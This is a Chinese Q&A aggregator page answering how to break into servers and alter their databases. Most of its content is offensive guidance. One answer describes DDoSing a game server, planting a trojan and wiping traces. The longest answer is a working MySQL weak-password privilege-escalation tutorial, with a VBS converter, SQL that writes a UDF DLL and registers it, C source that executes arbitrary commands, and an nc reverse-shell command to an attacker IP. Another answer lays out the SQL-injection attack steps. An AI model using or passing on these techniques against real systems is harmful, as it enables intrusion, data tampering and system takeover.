导航:首页 > 配服务器 > 如何入侵服务器修改数据库

如何入侵服务器修改数据库

发布时间:2022-06-14 00:46:29

❶ 如何进入游戏服务器修改自己的属性

在理论上并不难
第一:确定其服务器,一般来说一个网络游戏都会有一个或多个服务器构架,你必须先找到它们,可以通过检测、侦听客户端与服务端的地址互防,然后顺藤摸瓜找到其服务器的真正位置,当然,如今有很多技术可以避免你找到他们,但是作为一个动态服务器,它是没有可能逃过侦察的
第二:找到服务器后,你应当极尽所能的探知服务器的状况,也就是说你当通过各种手段了解其系统、运行特性,数据状况,有无备份及备份时间等等,知己知彼百战不殆!
第三:在详细了解起服务器状况,就可以着手对其实行绑票等计划,目前最好的选择是通过DDOS手段对其进行攻击,在其崩溃时予以入侵,将你预先编好的木马植入,要知道,这类服务器的数据库都是非常大的,如果你对那游戏的程序一无所知,几乎不可能找到你的数据存放地,而每一个网络游戏在制作之除就会考虑安全问题,所以,你下面要做的就是将游戏服务端下载出来并予以破截
第四:经过一番努力,你可能已经顺利完成了你的任务,不过别着急,在你兴奋之前应该先将那服务器中你曾经光顾的痕迹抹去。。。。。。。。

❷ 怎样入侵进入一个网站后台的数据库!入侵!

网站的后台一般是不能进入数据库的,(当然不排除有这种可能)
一般的网站都有自己的域名,有域名就有数据库,可以直接访问(就像网站一样,输入网址,然后就会有登陆框),如果是本地的话,安装好服务器和数据库,也可以直接用地址访问

❸ 如何黑服务器改数据

检测服务器存在的相关漏洞,拿下管理权限后从服务器上面操作数据库修改,改数据的时候注意主库和备份库的数据要同步才行

❹ 有没有入侵游戏(手游)服务器修改数据的可能

感谢提问,你说的情况理论上是可能的!不过那么大个游戏公司安全人员也不是吃素的,不然还怎么在IT混。只有那些黑客中的高手可以达到。但是这种级别的黑客是不屑做这种事情的 ,最多是拿下服务器权限,而不会去修改数据。当然最好还不要去干这种事情。

❺ 如何利用弱口令入侵MySQL数据库

很早网上就有了用mysql弱口令得到webshell教程,但是这次我要说的不是得到webshell,而是直接得到系统权限,看清楚了,是“直接”得到!

首先,我简单说一下mysql弱口令得到系统权限得过程:首先利用mysql脚本上传udf dll文件,然后利用注册UDF
DLL中自写的Function函数,而执行任意命令

思路很简单,网上也有一些教程,但是他们要么没有给具体的代码,要么一句话代过,搞得象我似得小菜很难理解,终于在我付出了几天得不断测试得辛勤劳动后,有了点结果,我把详细过程和相关代码得交给大家,这样大家就可以自己写dll文件,自己生成不同文件得二进制码啦!

下面,我们先说如何生成二进制文件得上传脚本。看看这段mysql脚本代码(网友Mix用的方法):
set @a =
concat('',0x0123abc1312389…..);
set @a = concat(@a,0x4658978abc545e……);

………………….

create table Mix(data LONGBLOB);//建表Mix,字段为data,类型为longblob

insert into Mix values("");update Mix set data = @a;//@a插入表Mix
select
data from Mix into DUMPFILE 'C:\\Winnt\\文件名';//导出表中内容为文件

前两句很熟悉把,这个就是我们以前注入的时候,绕过’的解决办法,把代码的16进制数声明给一个变量,然后导入这个变量就行了。只不过这里,因为16进制代码是一个文件的内容,代码太长了,所以就用了concat函数不断把上次得代码类加起来,这样不断累计到一个变量a中。后面几句就很简单了,我都有注释。

后面三句好说,但是前面的那么多16进制数据,手工的话,累人啊!不过你还记得以前有一个exe2bat.vbs脚本吗?这次我们可以把这个脚本修改一下后,得到我们这里需要得mysql脚本!对比exe2bat.vbs生成得文件和我们需要脚本的文件格式,我们可以轻松的得到我们所需的脚本。脚本内容如下:

fp=wscript.arguments(0
fn=right(fp,len(fp)-instrrev(fp,"\"))
with
createobject("adodb.stream")
.type=1:.open:.loadfromfile
fp:str=.read:sl=lenb(str)
end with
sll=sl mod 65536:slh=sl\65536

with
createobject("scripting.filesystemobject").opentextfile(fp&".txt",2,true)

.write "set @a = concat('',0x"
for i=1 to sl
bt=ascb(midb(str,i,1))

if bt<16 then .write "0"
.write hex(bt)
if i mod 128=0 then
.write ");" vbcrlf "set @a = concat(@a,0x"
next
end with

好了,现在只要你把所要上传的文件拖到这个脚本图标上面,就可以生成一个同名的txt文件了。这个txt文件,就是我们所需要的mysql脚本,当然我们还需要修改一下这个txt文件(毕竟他是我们偷工减料得来的!),把最后一行生成的多余的那句“set
@a = concat('',0x”删除了,加上建表,插值得那三句代码即可!

脚本生成了,如何上传?先登陆mysql服务器:

C:\>mysql –u root –h hostip –p
Mysql>use mysql;
//先进入mysql默认得数据库,否则你下一步的表将不知道属于哪个库
Mysql>\. E:\*.dll.txt;
//这儿就是你生成的mysql脚本
按照上面输入命令,就可以看见屏幕文字飞快闪烁(当然网速要快啦),不一会你的文件旧上传完毕了!

下面到达我们的重点,我们上传什么dll文件?就目前我再网上看到的有两个已经写好的dll文件,一个是Mix写得mix.dll,一个是envymask写得my_udf.dll,这两个我都用过,都很不错,但是都也有点不足。先来看看具体的使用过程吧!

先用mix.dll:
登陆mysql,输入命令:
Mysql> \. e:\mix.dll.txt;
Mysql>
CREATE FUNCTION Mixconnect RETURNS STRING SONAME 'C:\\windows\\mix.dll';

//这儿的注册的Mixconnect就是在我们dll文件中实现的函数,我们将要用他执行系统命令!
Mysql> select
Mixconnect('你的ip','8080'); //填写你的反弹ip和端口

过一会儿,你监听8080端口的nc,就会得到一个系统权限的shell了!如图1:

这个的确不错,通过反弹得到得shell可以传过一些防火墙,可惜的是,它的这个函数没有写得很好,只能执行一次,当你第二次连接数据库后,再次运行“select
Mixconnect('你的ip','8080');”的时候,对方的mysql会当掉!报错,然后服务停止!

所以,使用mix.dll你只有一次成功,没有再来一次的机会!另外根据我的测试,他对Win2003的系统好像不起作用。
再用my_udf.dll:

Mysql>\. C:\my_udf.dll.txt
Mysql> CREATE FUNCTION my_udfdoor
RETURNS STRING SONAME 'C:\\winnt\\my_udf.dll';

//同样地,my_udfdoor也是我们注册后,用来执行系统命令得函数
Mysql> select my_udfdoor('’);
//这儿可以随便写my_udfdoor得参数,相当于我们只是要激活这个函数
好了,现在你可以不用关这个shell了,我们再开一个cmd,使用:

D:\>nc hostip 3306
*
4.0.*-nt x$Eo~MCG f**k //看到这个后,输入“f**k”
,他是my_udfdoor默认密码,自己无法更改
过一会儿,你就有了系统权限的shell了,
由于他是hook
recv版,所以穿墙的能力很强,我是在上一个mix.dll反弹失败的情况下,才使用这个得,他果然不负所望!进系统后,发现它有双网卡,天网防火墙个人版V2.73,对外仅仅开放3306端口,由此可见,my_udf.dll确实有很强的穿透防火墙得能力!但是他也有一个bug,就是再我们连接激活这个函数后(就是使用了命令“select
my_udfdoor('’);”后),不管你是否连接,只要执行了:
Mysql>drop function my_udfdoor;
后,mysql也汇报错,然后挂掉,

所以,你使用这个dll文件无法删除你的痕迹!

最后,然我们自己写一个自定义的dll文件。看能不能解决问题。

我们仅仅使用mysql 得udf的示例作模版即可!看他的示例:

#include <stdlib.h>
#include <winsock.h>
#include
<mysql.h>
extern "C" {
char *my_name(UDF_INIT *initid, UDF_ARGS
*args, char *is_null,

char *error);
// 兼容C
}
char
*my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null,

char *error)

{
char * me = "my name";
return me;
// 调用此UDF将返回 my name
}

十分简单吧?好,我们只需要稍微改一下就可以有了自己的dll文件了:
下面是我的一个哥们Crackme是修改的:
#include
<stdlib.h>
#include <windows.h>
#include "mysql.h"

extern "C" __declspec(dllexport)char *sys_name(UDF_INIT *initid, UDF_ARGS
*args, char *is_null, char *error);// sys_name就是函数名,你可以任意修改

__declspec(dllexport) char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char
*is_null, char *error) //当然这儿的sys_name也得改!
{
char me[256] = {0};
if
(args->arg_count == 1){
strncpy(me,args->args[0],args->lengths[0]);

me[args->lengths[0]]='\0';
WinExec(me,SW_HIDE); //就是用它来执行任意命令

}else
strcpy(me,"do nonthing.\n");
return me;
}

好,我们编译成sysudf.dll文件就可以了!我们来用他实验一把!
看操作:
Mysql>\.
C:\sysudf.dll.txt
Mysql>Create function sys_name returns string soname
'C:\\windows\\sysudf.dll';
Mysql>\. Nc.exe.txt //把nc.exe也上传上去

Mysql>select sys_name('nc.exe -e cmd.exe 我的ip 8080');

//sys_name参数只有一个,参数指定要执行的系统命令
好,看看在Win2003中的一个反弹shell了,

当然,我们你也可以不反弹shell了,而去执行其他命令,只不过不论是否执行成功,都没有回显,所以要保证命令格式正确。对于这个dll文件,经过测试,不论何时“drop
function
sys_name;”,都是不会报错的,同时也可以多次运行不同命令。至于他的缺点,就是他的穿墙能力跟Mix.dll一样不算太强,但对于实在穿不透的墙,直接运行其他命令就是最好的选择了。

上面三个dll文件可谓各有所短,如何选择,就看你遇到的实际情况了。

好了,从脚本得编写使用到dll文件编写使用,说了这么多,现在大家应该都会了吧?题目说的是弱口令得到系统权限,但是如果你在注入等其他过程中,爆出了config.php中的mysql密码,不也是可以使用的吗?这样我们岂不是也找到继Serv-u后又一大提权方法了吗?

❻ 入侵数据库

想入侵网吧数据库 先得搞清楚网吧的交换层 也就是这个数据库是通过什么对外开放的

如果是通过软件实现的 比如:万象 PUBWIN 那么先要解决掉软件的限制

如果是通过WEB服务器实现的 那可以通过暴库和注入实现

一般的对于数据库的入侵,大众的方法都是以上两种 不过大型数据库还是需要寻找服务器的配置漏洞实现~

❼ 求教谁给讲讲SQL注入攻击的步骤

第一步:SQL注入点探测。探测SQL注入点是关键的第一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。通常只要带有输入提交的动态网页,并且动态网页访问数据库,就可能存在SQL注入漏洞。如果程序员信息安全意识不强,采用动态构造SQL语句访问数据库,并且对用户输入未进行有效验证,则存在SQL注入漏洞的可能性很大。一般通过页面的报错信息来确定是否存在SQL注入漏洞。
第二步:收集后台数据库信息。不同数据库的注入方法、函数都不尽相同,因此在注入之前,我们先要判断一下数据库的类型。判断数据库类型的方法有很多,可以输入特殊字符,如单引号,让程序返回错误信息,我们根据错误信息提示进行判断,还可以使用特定函数来判断。
第三步:猜解用户名和密码。数据库中的表和字段命名一般都是有规律的,通过构造特殊的SQL语句在数据库中依次猜解出表名、字段名、字段数、用户名和密码。
第四步:查找Web后台管理入口。Web后台管理通常不对普通用户开放,要找到后台管理的登录网址,可以利用Web目录扫描工具快速搜索到可能的登录地址,然后逐一尝试,便可以找到后台管理平台的登录网址。
第五步:入侵和破坏。一般后台管理具有较高权限和较多的功能,使用前面已破译的用户名、密码成功登录后台管理平台后,就可以任意进行破坏,比如上传木马、篡改网页、修改和窃取信息等,还可以进一步提权,入侵Web服务器和数据库服务器。

❽ 如何入侵数据库

用工具找到他的主机IP 共享他的数具 , 然后找到数据库,,连接,然后用说具库管理工具修改他的说具信息
工具吗很多自己找

阅读全文

与如何入侵服务器修改数据库相关的资料

热点内容
压缩因子定义 浏览:966
cd命令进不了c盘怎么办 浏览:212
药业公司招程序员吗 浏览:972
毛选pdf 浏览:659
linuxexecl函数 浏览:727
程序员异地恋结果 浏览:374
剖切的命令 浏览:228
干什么可以赚钱开我的世界服务器 浏览:290
php备案号 浏览:990
php视频水印 浏览:167
怎么追程序员的女生 浏览:487
空调外压缩机电容 浏览:79
怎么将安卓变成win 浏览:459
手机文件管理在哪儿新建文件夹 浏览:724
加密ts视频怎么合并 浏览:775
php如何写app接口 浏览:804
宇宙的琴弦pdf 浏览:396
js项目提成计算器程序员 浏览:944
pdf光子 浏览:834
自拍软件文件夹名称大全 浏览:328